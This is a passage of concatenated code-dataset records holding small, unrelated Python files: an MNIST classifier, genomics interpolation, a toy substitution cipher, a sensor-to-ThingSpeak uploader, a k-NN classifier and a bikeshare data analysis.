port=15000)\n","sub_path":"adminserver.py","file_name":"adminserver.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"47283171","text":"#! python\n\nimport tensorflow as tf \n\nimport os\n\n\nmnist = tf.keras.datasets.mnist\n\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\nimport matplotlib.pyplot as plt\n\nprint(f'length of x_test {len(x_test)}')\n\n\nmodel_filename= 'ibm_mnist_digits_2lyrs_3epochs.model'\n\n\n\ndef print_bitmap(digit):\n for i in digit:\n j = [f'{x:02X}' if x > 0 else ' ' for x in i]\n j.append('|')\n j = ''.join(j)\n print(j)\n print('--------------------------------------------------')\n\n\n\n\n# print(y_train[0])\n# plt.imshow(x_train[0], plt.cm.binary )\n# plt.show()\n\noriginal_image_test = x_test\n\nx_train = tf.keras.utils.normalize(x_train, axis=1)\nx_test = tf.keras.utils.normalize(x_test, axis=1)\n\n\nif not os.path.exists(model_filename):\n model = tf.keras.models.Sequential()\n model.add(tf.keras.layers.Flatten())\n model.add(tf.keras.layers.Dense(128, activation=tf.nn.relu))\n model.add(tf.keras.layers.Dense(128, activation=tf.nn.relu))\n model.add(tf.keras.layers.Dense(10, activation=tf.nn.softmax))\n\n model.compile(optimizer='adam', \n loss = 'sparse_categorical_crossentropy',\n metrics= 'accuracy' )\n model.fit(x_train, y_train, epochs=3)\n\n model.save('ibm_mnist_digits_2lyrs_3epochs.model')\n\nelse:\n model = tf.keras.models.load_model(model_filename)\n\n\nval_loss, val_acc = model.evaluate(x_test, y_test)\nprint(val_loss, val_acc)\n\npredictions = model.predict(x_test)\n\nimport numpy as np \n\n\nfor i in range(10):\n\n offset = 3000\n\n\n # plt.imshow(x_test[i+offset], plt.cm.binary )\n # plt.show()\n\n prediction = np.argmax(predictions[i+offset])\n \n print(f'PREDICTED {prediction}')\n print_bitmap(original_image_test[i+offset])\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"639295021","text":"import argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('filename')\nargs = parser.parse_args()\n\nwith open(args.filename, 'r') as f:\n with open('../../ordered.csv','w') as ord:\n for line in f:\n u, v = line.replace('\\n','').split(',')\n if u>v:\n ord.write('{},{}\\n'.format(v, u))\n else:\n ord.write(line)\n","sub_path":"experiments/separate.py","file_name":"separate.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"95171883","text":"import pandas as pd\nimport numpy as np\nimport argparse\n\n'''\ninterpolate genetic position into an eigenstrat snp file\n'''\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-m', '--map', type = str, default = \"\", help = \"input prefix\")\nparser.add_argument('-i', '--input', type = str, default = \"\", help = \"input snp file\")\nparser.add_argument('-o', '--output', type = str, default = \"\", help = \"output snp file\")\nargs = parser.parse_args()\n\nrecomb_map = pd.read_csv(args.map,\n sep = '\\t',\n header = None,\n names = ['CHROM', 'POS', 'CM'])\n\n\nsnp_input = pd.read_csv(args.input,\n sep = '\\t',\n header = None,\n names = ['ID', 'CHROM', 'CM', 'POS', 'REF', 'ALT'])\n\n\ndef interpolate_genetic_position(recomb_map, chrom, pos):\n '''return interpolated genetic position for a single chromosome\n '''\n recomb_map = recomb_map[recomb_map['CHROM'] == chrom]\n y = np.interp(x = pos, \n xp = recomb_map.POS,\n fp = recomb_map.CM,\n left = 0,\n right = np.max(recomb_map.CM))\n return list(y)\n\n\nall_pos = []\nfor c in range(1, 23):\n pos = snp_input[snp_input['CHROM'] == c]\n y = interpolate_genetic_position(recomb_map, chrom = c, pos = pos)\n all_pos.extend(y)\n\nsnp_output = snp_input.copy()\nsnp_output['CM'] = all_pos\nsnp_output[['ID', 'CHROM', 'CM', 'POS', 'REF', 'ALT']].to_csv(\n args.output,\n sep = '\\t',\n index= False, \n header = False)\n \n ","sub_path":"adnatools/eigenstrat/eigenstrat_CM_filler.py","file_name":"eigenstrat_CM_filler.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"449502197","text":"import argparse\nimport json\nimport os\n\nimport redis\n\nfrom pystdlib.uishim import get_selection\nfrom pystdlib import shell_cmd\n\n\nparser = argparse.ArgumentParser(description=\"Searchengines\")\nparser.add_argument(\"--fallback\", dest=\"use_fallback\", action=\"store_true\",\n default=False, help=\"Use fallback browser to open URL\")\nargs = parser.parse_args()\n\nr = redis.Redis(host='localhost', port=6379, db=0)\nsearchengines = json.loads(r.get(\"nav/searchengines\"))\n\n\nsearchengine = get_selection(searchengines.keys(), \"search with\", case_insensitive=True, lines=15, font=\"@wmFontDmenu@\")\nif searchengine:\n meta = searchengines[searchengine]\n url = meta[\"url\"]\n\n browser_cmd = meta.get(\"browser\", \"@defaultBrowser@\")\n if args.use_fallback:\n browser_cmd = \"@fallbackBrowser@\"\n\n vpn = meta.get(\"vpn\", None)\n if vpn:\n shell_cmd(f\"vpnctl --start {vpn}\")\n\n search_term = shell_cmd(\"xsel -o\").replace(\" \", \"+\")\n shell_cmd(f'{browser_cmd} {url}{search_term}'.split(), shell=False)\n","sub_path":"modules/navigation/scripts/search_selection.py","file_name":"search_selection.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"444800455","text":"\"\"\"cipherbot2.0.py: Encrypts and decrypts a message using a variable number of user-input keys.\"\"\"\n\nimport random\nimport os\nimport sys\nimport subprocess\n\n\ndef cipher(msg, seed, decrypt=False):\n def convert(msg, from_list, to_list):\n msg = list(msg)\n for letter in range(len(msg)):\n for char in range(len(from_list)):\n if msg[letter] == from_list[char]:\n msg[letter] = to_list[char]\n break\n elif msg[letter] == from_list[char].upper():\n msg[letter] = to_list[char].upper()\n break\n return \"\".join(msg)\n\n ALPHABET = list(\"abcdefghijklmnopqrstuvwxyz\")\n salpha = list(\"abcdefghijklmnopqrstuvwxyz\")\n random.seed(seed)\n random.shuffle(salpha)\n random.seed(None)\n if not decrypt:\n return convert(msg, ALPHABET, salpha)\n else:\n return convert(msg, salpha, ALPHABET)\n\n\ndef from_file(prompt):\n filename = input(prompt)\n if not filename.endswith(\".txt\"):\n filename += \".txt\"\n message = []\n with open(os.getcwd() + \"\\\\\" + filename, \"r\") as fh:\n for line in fh:\n message.append(line)\n return \"\\n\".join(message)\n\n\ndef to_file(filename, msg):\n if not filename.endswith(\".txt\"):\n filename += \".txt\"\n with open(os.getcwd() + \"\\\\\" + filename, \"w\") as fh:\n fh.write(msg)\n\n\ndef print_title(title, char=\"#\", simple=False):\n if not simple:\n filler = char * (8 + len(title))\n print(\"\\n \" + filler)\n print(\" {0} {1} {0}\".format(char, title))\n print(\" \" + filler)\n else:\n print(\"\\n {0} \\n {1}\".format(title, char * (6 + len(title))))\n\n\ndef clear_screen():\n command = ([\"clear\"] if not sys.platform.startswith(\"win\")\n else [\"cmd.exe\", \"/C\", \"cls\"])\n subprocess.call(command)\n\n\n# Main\ndef main():\n try:\n while True:\n clear_screen()\n print_title(\"CipherBot 2.0\")\n option = int(input(\"\\n 1. Encryption\\n 2. Decryption\\n > \"))\n\n # Encryption\n if option == 1:\n msg = input(\"\\n Enter a message to encrypt: \")\n\n key_num = int(input(\"\\n How many keys would you like \"\n \"to provide for this encryption?\\n > \"))\n print()\n keys = []\n for num in range(key_num):\n keys.append(input(\" Key #{0:d}: \".format(num + 1)))\n for key in keys:\n msg = cipher(msg, key)\n print(\"\\n Encrypted message: \" + msg)\n\n if input(\"\\n Export this message? (y/n): \") == \"y\":\n filename = input(\"\\n Enter a filename: \")\n to_file(filename, msg)\n\n if input(\"\\n Again? (y/n): \") != \"y\":\n break\n\n # Decryption\n elif option == 2:\n if input(\"\\n Import a message? (y/n): \") == \"y\":\n msg = from_file(\"\\n Enter the name of the file: \")\n else:\n msg = input(\"\\n Enter a message to decrypt: \")\n\n key_num = int(input(\"\\n How many keys were used to encrypt\"\n \" this message?\\n > \"))\n print(\"\\n Enter {0} {1}key{2}{3}:\\n\".format(\n \"this\" if key_num < 2 else \"these\",\n \"\" if key_num < 2 else str(key_num) + \" \",\n \"\" if key_num < 2 else \"s\",\n \" in the same order used to encrypt \"\n \"the message\" if key_num > 1 else \"\"))\n keys = []\n for num in range(key_num):\n keys.append(input(\" Key #{0:d}: \".format(num + 1)))\n for key in reversed(keys):\n msg = cipher(msg, key, True)\n print(\"\\n Decrypted message: \" + msg)\n\n if input(\"\\n Again? (y/n): \") != \"y\":\n break\n\n # Anything else\n else:\n break\n except (ValueError, IOError) as err:\n clear_screen()\n print(\"\\n {!s}\".format(err))\n input(\" Press any key to quit: \")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/cipherbot2.0.py","file_name":"cipherbot2.0.py","file_ext":"py","file_size_in_byte":4244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"615195266","text":"# coding: UTF-8\n\nfrom ..models.baby_model import Baby\nfrom ..models.feature_model import Collect\nfrom ..util.seesion_query import *\nfrom ..util.others import page_utils\n\n\ndef baby_list(page):\n \"\"\"\n 全部婴儿列表\n \"\"\"\n baby_count = Baby.query.filter().count()\n page, per_page = page_utils(baby_count, page)\n if baby_count > 1:\n babys = Baby.query.filter()[per_page*(page-1):per_page*page]\n return babys\n else:\n baby = Baby.query.filter().first()\n return baby\n\n\ndef baby_collect_list(page, doctor_id):\n \"\"\"\n 得到医生收藏婴儿列表\n page: 分页,当前页\n doctor_id: 医生的id\n \"\"\"\n result_count = session.query(Baby). \\\n filter(Collect.doctor_id == doctor_id, Collect.type == 'baby').count()\n page, per_page = page_utils(result_count, page)\n if result_count > 1:\n results = session.query(Baby).\\\n filter(Collect.doctor_id == doctor_id, Collect.type == 'baby')[per_page*(page-1):per_page*page]\n return results\n else:\n result = session.query(Baby).\\\n filter(Collect.doctor_id == doctor_id, Collect.type == 'baby').first()\n return result","sub_path":"baby/services/baby_service.py","file_name":"baby_service.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"355092675","text":"import sys\nimport os\nimport click\nimport logging\nimport yaml\nfrom datetime import datetime, timedelta, timezone\n\n\n# 親ディレクトリをアプリケーションのホーム(${app_home})に設定\napp_home = os.path.abspath(os.path.join( os.path.dirname(os.path.abspath(__file__)) , \"..\" ))\n# ${app_home}をライブラリロードパスに追加\nsys.path.append(os.path.join(app_home))\n\nfrom lib import sample_service as service\n\n\ndef cmd () :\n\n # 処理\n try:\n\n # ログ開始\n\n # 設定値取得\n with open('./conf/config.yml', 'r') as yml_file:\n data = yaml.load(yml_file)\n print(data, type(data))\n\n print(data['msg']['ms001'])\n # メッセージID取得\n\n # ここで処理を呼ぶのは一回のみ\n # 呼び先で処理をコントロールする\n # 処理実行\n print(\"***\")\n service.sample()\n\n \n # タイムゾーンの生成\n JST = timezone(timedelta(hours=+9), 'JST')\n datestr = datetime.now(JST).isoformat(timespec='seconds')\n print(\"現在日付: {0}\".format(datestr))\n\n print(\"**\")\n\n # ログ終了\n\n except Exception as e:\n # エラー返却\n print(e)\n # 処理のエラーをここでキャッチ\n sys.exit(1)\n\nif __name__ == '__main__':\n cmd() ","sub_path":"bin/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"181060524","text":"from django.contrib.admin.models import LogEntry, ADDITION, CHANGE,DELETION\nfrom django.contrib.contenttypes.models import ContentType\nfrom models import *\nimport datetime\nimport string\ndef ignorekey(a):\n d = dict(zip(map(string.lower,a.keys()),a.values()))\n return d\ndef cmp(d1,d2):\n s = u''\n d1 = ignorekey(d1)\n d2 = ignorekey(d2)\n for k in d1.keys():\n if d1[k.lower()] != d2[k.lower()]:\n s = s + '%s:from %s to %s;' % (k,d1[k],d2[k])\n return s\n\ndef log_addition(request, object,name,message):\n LogEntry.objects.log_action(\n user_id = request.user.pk,\n content_type_id = ContentType.objects.get_for_model(object).pk,\n object_id = object.pk,\n object_repr = name,\n action_flag = ADDITION,\n change_message = message\n )\n\ndef log_change(request, object,name, message):\n LogEntry.objects.log_action(\n user_id = request.user.pk,\n content_type_id = ContentType.objects.get_for_model(object).pk,\n object_id = object.pk,\n object_repr = name,\n action_flag = CHANGE,\n change_message = message\n )\n\ndef log_deletion(request, object,name,message):\n LogEntry.objects.log_action(\n user_id = request.user.id,\n content_type_id = ContentType.objects.get_for_model(object).pk,\n object_id = object.pk,\n object_repr = name,\n action_flag = DELETION,\n change_message = message\n )\ndef log_login(username,result):\n if result == 'ok':\n i= Loginlog(\n user = username,\n action = 1, \n result = 1,\n message = 'login sucessed'\n )\n i.save()\n else:\n i = Loginlog(\n user = username,\n action = 1,\n result = 2,\n message = 'login failed'\n )\n i.save()\ndef log_logoff(username):\n i= Loginlog(\n user = username,\n action = 2,\n result = 1,\n message = 'logoff sucessed'\n )\n i.save()\n","sub_path":"cmdb/cmdb_log.py","file_name":"cmdb_log.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"124095336","text":"#!/bin/python\n\n# Note, this should be run within the Docker image provided to have all depdendencies, see\n# ../Dockerfile in the base repo along with the README.md for setup instructions\n\nimport pandas\nimport numpy\nimport os\n\n# Let's make sure we are working from CODE HOME\nCODE_HOME = os.environ[\"CODE_HOME\"]\nos.chdir(CODE_HOME)\n\n# First load the data - we have final_3.tsv from Yu, and ideally we should have a pipeline\n# that goes from data collection --> input into this algorithm. This will work for now.\nrawData = pandas.read_csv(\"stanford-data/final_3.csv\")\n\n#rawData.shape\n# (117816, 19)\n\n# We want the Stanford data to have the exact same form as the chapman data, meaning\n# these columns\n# 'id', 'impression', 'disease_state', 'uncertainty', 'quality', 'historicity', 'pe rslt'], dtype='object'\n\n# Here is what we have:\n#rawData.columns\n# ['pat_deid', 'order_deid', 'days_age_at_ct', 'rad_report', 'impression',\n# 'batch', 'disease_state_label', 'uncertainty_label', 'quality_label',\n# 'historicity_label', 'disease_state_prob', 'uncertainty_prob',\n# 'quality_prob', 'historicity_prob', 'disease_PEfinder',\n# 'looking_for_PE?', 'train=2/test=1', 'disease_probability_test',\n# 'probability_looking_for_PE'],\n\n# From Chapman paper:\n# ...probably positive and definitely positive were collapsed to positive; probably negative, indeterminate, and definitely negative were considered negative;\n\n# Our disease_state_labels should be mapped onto Neg, Pos, and nan\nlookup = {\"definitely negative\":\"Neg\", \n \"definitely positive\":\"Pos\",\n \"probably negative\":\"Neg\",\n \"probably positive\":\"Pos\",\n \"Indeterminate\":\"Neg\",\n numpy.nan:numpy.nan}\n\ndisease_labels = [lookup[x] for x in rawData.disease_state_label.tolist()]\nrawData['disease_state'] = disease_labels\n\n# Same with uncertainty labels\n# From Chapman paper:\n# definitely negative and definitely positive were considered certain; and probably negative, inderminate, and probably positive were considered uncertain.\nlookup = {\"definitely negative\":\"Yes\", \n \"definitely positive\":\"Yes\",\n \"probably negative\":\"No\",\n \"probably positive\":\"No\",\n \"Indeterminate\":\"No\",\n numpy.nan:numpy.nan}\n\nuncertain_labels = [lookup[x] for x in rawData.uncertainty_label.tolist()]\nrawData['uncertainty'] = uncertain_labels\n\n\n# Quality label\nlookup = {\"diagnostic\":\"Diagnostic\", \n \"non-diagnostic\":\"Not Diagnostic\",\n \"limited\":\"Limited\",\n numpy.nan:numpy.nan}\n\nquality_labels = [lookup[x] for x in rawData.quality_label.tolist()]\nrawData['quality'] = quality_labels\n\n\n# Historicity labels\nlookup = {\"new\":\"New\", \n \"old\":\"Old\",\n \"mixed\":\"Mixed\",\n numpy.nan:numpy.nan}\n\nhist_labels = [lookup[x] for x in rawData.historicity_label.tolist()]\nrawData['historicity'] = hist_labels\n\n# We don't care about the latter columns that were built from a previous model - let's filter\n# down to @mlungren's annotations, and the original reports\n\nrawData = rawData.drop(labels=[\"disease_state_prob\",\"uncertainty_prob\",\"quality_prob\",\"historicity_prob\",\n \"train=2/test=1\",\"disease_probability_test\",\"probability_looking_for_PE\"],axis=1)\n\n# Let's filter down to those that are in a batch (meaning we can ues them)\nrawData = rawData[rawData.disease_state.isnull()==False]\n\n# How many in each batch?\nrawData.batch.value_counts()\n#2.0 474\n#1.0 253\n#4.0 160\n#3.0 57\n#Name: batch, dtype: int64\n\n# Batch 2 has the most, but we know they are not independent from batch 1, so we should use one\n# or the other.\nrawData.to_csv(\"stanford-data/stanford_df.tsv\",sep=\"\\t\")\n","sub_path":"classifiers/0.reportsPrep.py","file_name":"0.reportsPrep.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"248879820","text":"import sys\nimport urllib3\nmyAPI='0F5QQ31B2ZECFJTA'\n#from datetime import datetime\nimport time,board, adafruit_dht\nhttp=urllib3.PoolManager() \ndhtDevice= adafruit_dht.DHT11(board.D23) \nwhile True:\n try:\n temperature_c = dhtDevice.temperature\n temperature_f = temperature_c * (9 / 5) + 32\n humidity = dhtDevice.humidity\n# temperature_c = 12\n# temperature_f = 30\n# humidity = 100\n link='https://api.thingspeak.com/update?api_key={0}&field1={1:0.1f}&field2={2:0.1f}'.format(myAPI,temperature_c,humidity)\n r=http.request('GET',link)\n print(r.status)\n \n time.sleep(10)\n except Exception as E:\n print(E)\n time.sleep(5)\n","sub_path":"DHT11_connect_thingspeak.py","file_name":"DHT11_connect_thingspeak.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"14627694","text":"'''\nQuestion 2.1 Skeleton Code\n\nHere you should implement and evaluate the k-NN classifier.\n'''\n\nimport data\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom collections import defaultdict\nfrom sklearn.model_selection import KFold\n\nclass KNearestNeighbor(object):\n '''\n K Nearest Neighbor classifier\n '''\n\n def __init__(self, train_data, train_labels):\n self.train_data = train_data\n self.train_norm = (self.train_data**2).sum(axis=1).reshape(-1,1)\n self.train_labels = train_labels\n\n def l2_distance(self, test_point):\n '''\n Compute L2 distance between test point and each training point\n \n Input: test_point is a 1d numpy array\n Output: dist is a numpy array containing the distances between the test point and each training point\n '''\n # Process test point shape\n test_point = np.squeeze(test_point)\n if test_point.ndim == 1:\n test_point = test_point.reshape(1, -1)\n assert test_point.shape[1] == self.train_data.shape[1]\n\n # Compute squared distance\n test_norm = (test_point**2).sum(axis=1).reshape(1,-1)\n dist = self.train_norm + test_norm - 2*self.train_data.dot(test_point.transpose())\n \n return np.squeeze(dist)\n\n def query_knn(self, test_point, k):\n '''\n Query a single test point using the k-NN algorithm\n\n You should return the digit label provided by the algorithm\n '''\n l2_distance = self.l2_distance(test_point)\n sorted_labels = self.train_labels[np.argpartition(l2_distance, (1,k))]\n \n tie = True\n digit = \"\"\n nn_votes = defaultdict(int)\n for i in range(0, k):\n nn_votes[sorted_labels[i]] += 1\n \n while (tie):\n highest_vote = max(nn_votes.values())\n if(len([key for key, value in nn_votes.items() if value == highest_vote]) > 1):\n k -= 1\n nn_votes[sorted_labels[k]] -= 1 \n continue\n else:\n digit = max(nn_votes, key=nn_votes.get)\n tie = False\n \n return digit\n\ndef cross_validation(train_data, train_labels, k_range=np.arange(1,16)):\n '''\n Perform 10-fold cross validation to find the best value for k\n\n Note: Previously this function took knn as an argument instead of train_data,train_labels.\n The intention was for students to take the training data from the knn object - this should be clearer\n from the new function signature.\n '''\n folds = 10\n kf = KFold(n_splits=folds)\n best_k = 1\n average_accuracy_for_best_k = 0\n \n for k in k_range:\n accuracy_sum = 0\n for train_index, test_index in kf.split(train_data):\n X_train, X_test = train_data[train_index], train_data[test_index]\n y_train, y_test = train_labels[train_index], train_labels[test_index]\n \n knn = KNearestNeighbor(X_train, y_train)\n validation_accuracy = classification_accuracy(knn, k, X_test, y_test)\n accuracy_sum += validation_accuracy\n \n average_accuracy = accuracy_sum/folds\n if (average_accuracy > average_accuracy_for_best_k):\n average_accuracy_for_best_k = average_accuracy\n best_k = k \n \n return best_k, average_accuracy_for_best_k\n\ndef classification_accuracy(knn, k, eval_data, eval_labels):\n '''\n Evaluate the classification accuracy of knn on the given 'eval_data'\n using the labels\n '''\n accuracy_counter = defaultdict(bool)\n for i in range(0, eval_data.shape[0]):\n label = knn.query_knn(eval_data[i], k)\n accuracy_counter[label == eval_labels[i]] += 1\n \n return accuracy_counter[True]/eval_data.shape[0]\n\ndef main():\n train_data, train_labels, test_data, test_labels = data.load_all_data('data')\n knn = KNearestNeighbor(train_data, train_labels)\n \n optimal_k, average_accuracy_for_best_k = cross_validation(train_data, train_labels) \n print(\"The optimal k is {:d}\".format(optimal_k))\n print(\"The average accuracy across folds for k={:d} is {:f}\".format(optimal_k, average_accuracy_for_best_k))\n print(\"The training accuracy for k={:d} is {:f}\".format(optimal_k, classification_accuracy(knn, optimal_k, train_data, train_labels)))\n print(\"The test accuracy for k={:d} is {:f}\".format(optimal_k, classification_accuracy(knn, optimal_k, test_data, test_labels)))\n\nif __name__ == '__main__':\n main()","sub_path":"CSC411_Machine_learning_and_Data_Mining/assignment2/q2_1.py","file_name":"q2_1.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"186979587","text":"# Spencer Brase\n# CTEC 121 / Summer 2019\n# Module 4 / Problem Set 5 \n# Problem 2 (50 points)\n\n\"\"\"\nUsing the graphics library, develop a Python program to draw the a set of LEGOS. You will find a picture of the LEGO's in a file named LEGOS.png.\n\nBe sure to create one LEGO and then use the .clone() method whenever possible to create the other five.\n\"\"\"\n\nfrom graphics import *\n\ndef main():\n win = GraphWin(\"Legos\", 800,800)\n # draw the base of the Lego\n base1 = Rectangle(Point(20,160),Point(240,230))\n base1.setFill(\"black\")\n base1.setWidth(2)\n base1.setOutline(\"red\")\n base1.draw(win)\n # Draw the knubs on to of the base of the lego\n knub1 = Rectangle(Point(30,149),Point(60,160))\n knub1.setFill(\"black\")\n knub1.setWidth(4)\n knub1.setOutline(\"red\")\n knub1.draw(win)\n knub2 = Rectangle(Point(80,149),Point(110,160))\n knub2.setFill(\"black\")\n knub2.setWidth(4)\n knub2.setOutline(\"red\")\n knub2.draw(win)\n knub3 = Rectangle(Point(130,149),Point(160,160))\n knub3.setFill(\"Black\")\n knub3.setWidth(4)\n knub3.setOutline(\"red\")\n knub3.draw(win)\n knub4 = Rectangle(Point(180,149),Point(210,160))\n knub4.setFill(\"Black\")\n knub4.setWidth(4)\n knub4.setOutline(\"red\")\n knub4.draw(win)\n base2 = base1.clone()\n base2.move(235, 20)\n base2.setFill(\"red\")\n base2.setOutline(\"black\")\n base2.setWidth(4)\n base2.draw(win)\n base3 = base1.clone()\n base3.move(500, 20)\n base3.setFill(\"Blue\")\n base3.setOutline(\"Black\")\n base3.setWidth(4)\n base3.draw(win)\n base4 = base1.clone()\n base4.setFill(\"Green\")\n base4.setOutline(\"Black\")\n base4.setWidth(4)\n base4.move(20, 120)\n base4.draw(win)\n base5 = base1.clone()\n base5.setFill(\"Cyan\")\n base5.setOutline(\"Black\")\n base5.setWidth(4)\n base5.move(250, 120)\n base5.draw(win)\n base6= base1.clone()\n base6.setFill(\"Brown\")\n base6.setOutline(\"Black\")\n base6.setWidth(4)\n base6.move(500, 120)\n base6.draw(win)\n knub2 = knub1.clone()\n knub2.move(240, 20)\n knub2.setFill(\"Red\")\n knub2.setWidth(4)\n knub2.setOutline(\"Black\")\n knub2.draw(win)\n knub3 = knub2.clone()\n knub3.move(50, 0)\n knub3.draw(win)\n knub4 = knub2.clone()\n knub4.move(100, 0)\n knub4.draw(win)\n knub5 = knub2.clone()\n knub5.move(150, 0)\n knub5.draw(win)\n knub6 = knub2.clone()\n knub6.move(260, 0)\n knub6.setFill(\"Blue\")\n knub6.draw(win)\n knub7 = knub2.clone()\n knub7.move(320, 0)\n knub7.setFill(\"Blue\")\n knub7.draw(win)\n knub8 = knub2.clone()\n knub8.setFill(\"Blue\")\n knub8.move(370, 0)\n knub8.draw(win)\n knub9 = knub2.clone()\n knub9.setFill(\"Blue\")\n knub9.move(420, 0)\n knub9.draw(win)\n knub10 = knub1.clone()\n knub10.move(20, 120)\n knub10.setFill(\"Green\")\n knub10.setOutline(\"black\")\n knub10.draw(win)\n knub11 = knub1.clone()\n knub11.setFill(\"Green\")\n knub11.setOutline(\"Black\")\n knub11.move(70, 120)\n knub11.draw(win)\n knub12 = knub1.clone()\n knub12.move(120, 120)\n knub12.setFill(\"Green\")\n knub12.setOutline(\"Black\")\n knub12.draw(win)\n knub13 = knub1.clone()\n knub13.move(120, 135)\n knub13.setFill(\"Green\")\n knub13.setOutline(\"Black\")\n knub14 = knub1.clone()\n knub14.move(170, 120)\n knub14.setFill(\"Green\")\n knub14.setOutline(\"Black\")\n knub14.draw(win)\n knub15 = knub14.clone()\n knub15.move(100, 0)\n knub15.setFill(\"Cyan\")\n knub15.draw(win)\n knub16 = knub14.clone()\n knub16.setFill(\"Cyan\")\n knub16.move(149, 0)\n knub16.draw(win)\n knub17 = knub14.clone()\n knub17.setFill(\"Cyan\")\n knub17.move(200, 0)\n knub17.draw(win)\n knub18 = knub14.clone()\n knub18.setFill(\"Cyan\")\n knub18.move(240, 0)\n knub18.draw(win)\n knub19 = knub14.clone()\n knub19.setFill(\"Brown\")\n knub19.move(340, 0)\n knub19.draw(win)\n knub20 = knub14.clone()\n knub20.setFill(\"Brown\")\n knub20.move(400, 0)\n knub20.draw(win)\n knub21 = knub14.clone()\n knub21.move(450, 0)\n knub21.setFill(\"Brown\")\n knub21.draw(win)\n knub22 = knub14.clone()\n knub22.setFill(\"Brown\")\n knub22.move(490, 0)\n knub22.draw(win)\n\n # close the program\n input(\"Press Enter to close Program\")\n # close graphics window\n win.close()\n\n \n\n\nmain()","sub_path":"problem-set-5-problem-2.py","file_name":"problem-set-5-problem-2.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"474517479","text":"import time\nimport numpy as np\nimport pandas as pd\n\ncity_data = {'chicago':'chicago.csv',\n 'new york':'new_york_city.csv',\n 'washington':'washington.csv'\n }\ndef filter_data():\n \"\"\"ask user to select a city (str), month(str), and day(str, from monday to sunday)\n if there is no specific preference, please use \"all\"\"\"\n invalid_input = ('invalid input, try again')\n print (\"Let us explore some US bikeshare data!\")\n while True:\n city = input(\"Type a city! (chicago, new york, washington or all to include all of them)\\n\").lower()\n if city in ['chicago', 'new york', 'washington', 'all']:\n print ('input pass')\n break\n else:\n print (invalid_input)\n\n while True:\n month = input (\"Type a month! (from january to june, or all to include all months)\\n\").lower()\n if month in [\"january\", \"february\", \"march\", \"april\", \"may\", \"june\", \"all\"]:\n print ('input pass')\n break\n else:\n print (invalid_input)\n\n while True:\n day = input (\"Type a day! (from monday to sunday)\\n\").lower()\n if day in [\"monday\", \"tuesday\", \"wednesday\", \"thursday\", \"friday\", \"saturday\", \"sunday\", \"all\"]:\n print ('input pass')\n break\n else:\n print (invalid_input)\n return city, month, day\n\ndef data_load(city, month, day):\n \"\"\"ask user to select a city (str), month(str), and day(str, from monday to sunday)\n if there is no specific preference, please use \"all\"\"\"\n if city != 'all':\n file_name = city_data[city]\n df =pd.read_csv(file_name)\n else:\n df =pd.concat(map(pd.read_csv,['chicago.csv','new_york_city.csv', 'washington.csv']),sort=True)\n #convert the format of Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n df['End Time'] = pd.to_datetime(df['End Time'])\n #create a column “month\"\n df['month'] = df['Start Time'].dt.month\n #create a column \"day of week\"\n df['day_of_week'] = df['Start Time'].dt.weekday_name\n #create a column \"duration of trip\"\n # filter by month if applicable\n if month != 'all':\n # use the index of the months list to get the corresponding int\n months = ['january', 'february', 'march', 'april', 'may', 'june']\n month = months.index(month) + 1\n #print(month)\n # filter by month to create the new dataframe\n df = df[df['month'] == month]\n #print(df)\n else:\n df = df\n\n # filter by day of week if applicable\n if day != 'all':\n # filter by day of week to create the new dataframe\n df = df[df['day_of_week'] == day.title()]\n else:\n df=df\n #print(df)\n\n return df\ndef stat(df):\n question = input (\"Do you want to include all statistical tests? Yes or No,any word other than yes or no will be considered as yes\\n\").lower()\n if question !=(\"no\"):\n #display the distribution of trip duration\n start_time=time.time()\n print(\"The distribution of trip duration(second):\\n\",df['Trip Duration'].describe()[['mean','std','25%','50%','75%']].round(1))\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n #display most commonly used start station\n start_time=time.time()\n print('\\n\\nMost commonly used start station:\\n',df['Start Station'].value_counts().idxmax())\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n #display most commonly used end station\n start_time=time.time()\n print('\\n\\nMost commonly used end station:\\n',df['End Station'].value_counts().idxmax())\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n #display most frequent route\n start_time=time.time()\n Start_Stop_stations = df['Start Station'] + \"*\" + df['End Station']\n common_station = Start_Stop_stations.value_counts().idxmax()\n print('\\n\\nMost frequent used route is:\\n{} \\nto\\n{}'.format(common_station.split('*')[0], common_station.split('*')[1]))\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n #display total travelling events\n start_time=time.time()\n print(\"\\n\\nThe total trip events 